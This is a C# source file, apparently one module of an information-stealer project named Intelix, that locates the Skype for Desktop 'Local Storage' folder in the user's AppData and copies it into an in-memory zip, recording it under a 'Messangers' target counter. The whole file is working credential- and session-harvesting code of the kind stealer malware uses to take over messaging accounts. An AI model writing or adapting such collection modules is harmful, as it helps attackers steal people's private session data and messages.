Files

25 lines
820 B
C#
Raw Permalink Normal View History

2026-08-27 10:55:23 -06:00
using System;
using System.IO;
using Intelix.Helper.Data;
namespace Intelix.Targets.Messangers;
public class Skype : ITarget
{
public void Collect(InMemoryZip zip, Counter counter)
{
string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft", "Skype for Desktop", "Local Storage");
if (Directory.Exists(text))
{
Counter.CounterApplications counterApplications = new Counter.CounterApplications();
counterApplications.Name = "Skype";
string text2 = Path.Combine("Skype", "Local Storage");
zip.AddDirectoryFiles(text, text2);
counterApplications.Files.Add(text + " => " + text2);
counterApplications.Files.Add(text2);
counterApplications.Files.Add("Skype\\");
counter.Messangers.Add(counterApplications);
}
}
}